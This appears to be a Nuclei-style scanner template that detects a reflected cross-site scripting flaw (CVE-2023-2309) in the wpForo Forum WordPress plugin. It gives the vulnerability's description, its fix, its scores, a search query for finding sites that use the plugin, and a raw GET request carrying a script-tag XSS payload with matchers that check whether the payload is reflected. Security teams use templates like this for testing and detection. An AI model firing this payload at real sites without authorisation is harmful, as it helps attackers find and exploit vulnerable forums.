CVE-2023-2309: wpForo Forum <= 2.1.8 - Cross-Site Scripting

id: CVE-2023-2309

info:
  name: wpForo Forum <= 2.1.8 - Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    The wpForo Forum plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘wpforo_debug’ function in versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  remediation: Fixed in 2.1.9
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2309
    - https://wpscan.com/vulnerability/1b3f4558-ea41-4749-9aa2-d3971fc9ca0d/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-218-reflected-cross-site-scripting-via-wpforo-debug
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2309
    epss-score: 0.09761
    epss-percentile: 0.92667
    cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gvectors
    product: wpforo_forum
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wpforo/"
  tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss

http:
  - raw:
      - |
        GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"<script>alert(/document.domain/)</script>","wpforo")'
          - 'contains(header,"text/html")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022067f5445d4e45e4dff93904e898419a82aeec7738fa4d6422706a3037055ff37b022100d5fd01fe8edf6508cc2d5a2d7cf3db0c59432668298701bb4eb22c70a4433896:922c64590222798bb761d5b6d8e72950